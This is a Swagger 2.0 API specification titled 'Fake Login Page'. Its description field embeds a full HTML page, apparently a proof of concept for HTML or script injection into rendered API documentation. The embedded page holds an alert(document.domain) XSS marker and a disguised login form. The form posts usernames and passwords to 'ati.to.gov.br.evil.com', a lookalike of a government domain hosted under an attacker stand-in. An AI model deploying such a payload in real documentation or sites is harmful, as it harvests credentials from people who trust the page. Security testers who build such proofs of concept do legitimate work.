swagger: '2.0'
info:
  version: 1.0.0
  title: Fake Login Page
  description: '<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/5.0.0-alpha1/css/bootstrap.min.css"
        integrity="sha384-r4NyP46KrjDleawBgD5tp8Y7UzmLA05oM1iAEQ17CSuDqnUK2+k9luXQOfXJCJ4I" crossorigin="anonymous">
    <script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.0/dist/umd/popper.min.js"
        integrity="sha384-Q6E9RHvbIyZFJoft+2mJbHaEWldlvI9IOYy5n3zV9zzTtmI3UksdQRVvoxMfooAo"
        crossorigin="anonymous"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/5.0.0-alpha1/js/bootstrap.min.js"
        integrity="sha384-oesi62hOLfzrys4LxRF63OJCXdXDipiYWBnvTl9Y9/TRlw5xlKIEHpNyvvDShgf/"
        crossorigin="anonymous"></script>

    <title>FanBookPage</title>

    <style>
        .mytitle {
            width: 100%;
            height: 250px;
            background-image: linear-gradient(0deg, rgba(0, 0, 0, 0.5), rgba(0, 0, 0, 0.5)), url('/Users/aritdutta/Desktop/test.png');
            /* background-position: center; */
            background-size: cover;
            color: white;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
        }
        .transparent {
            background-color: transparent; border: 1px solid rgba(255, 255, 255, 0.7); color: white;
        }
    </style>

    <script>
        function hey() {
            alert(document.domain);
        }
    </script>
</head>

<body>

    <div class="container mt-5">
        <div class="row">
            <div class="col-md-6 offset-md-3">

                <div class="card border-dark mb-3">

                    <div class="card">
                        <div class="mytitle">
                            <div class="card-body">
                                <form action="https://ati.to.gov.br.evil.com" method="post">

                                    <div class="form-group row">
                                        <label for="inputUsername" class="col-sm-4 col-form-label">Username:</label>

                                        <div class="col-sm-10">
                                            <input type="username" class="form-control transparent" id="inputUsername">
                                        </div>
                                    </div>
                                    <div class="form-group row">
                                        <label for="inputPassword" class="col-sm-4 col-form-label">Password:</label>
                                        <div class="col-sm-10">
                                            <input type="password" class="form-control transparent" id="inputPassword">
                                        </div>
                                    </div>
                                    <br>

                                    <div class="d-grid gap-6">
                                        <button onclick="hey()" type="submit" class="btn btn-dark transparent">Login</button>
                                    </div>

                                </form>
                            </div>
                        </div>
                    </div>

                </div>

            </div>
        </div>

    </div>
    </div>

</body>

</html>'
paths:
  /:
    post:
      responses:
        '200':
          description: Login successful
